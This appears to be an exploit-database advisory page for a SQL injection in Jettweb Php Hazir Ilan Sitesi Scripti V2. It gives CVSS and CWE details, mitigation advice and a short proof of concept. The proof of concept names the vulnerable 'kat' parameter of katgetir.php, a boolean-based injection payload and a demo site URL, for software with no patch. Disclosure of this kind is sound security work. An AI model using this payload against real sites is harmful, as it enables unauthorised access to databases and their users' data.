header-logo
Suggest Exploit
vendor:
Jettweb Php Hazir Ilan Sitesi Scripti V2
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jettweb Php Hazir Ilan Sitesi Scripti V2
Affected Version From: V2
Affected Version To: V2
Patch Exists: NO
Related CWE:
CPE: a:jettweb:jettweb_php_hazir_ilan_sitesi_scripti_v2
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Jettweb Php Hazir Ilan Sitesi Scripti V2 – SQL Injection

An SQL injection vulnerability exists in Jettweb Php Hazir Ilan Sitesi Scripti V2, which allows an attacker to execute arbitrary SQL commands via the vulnerable parameter 'kat' in the 'katgetir.php' script. The payload 'kat=1' OR NOT 1300=1300-- rwTf' can be used to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC : SQLi -----

Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf

Navigation

Suggest Exploit

Services By CQR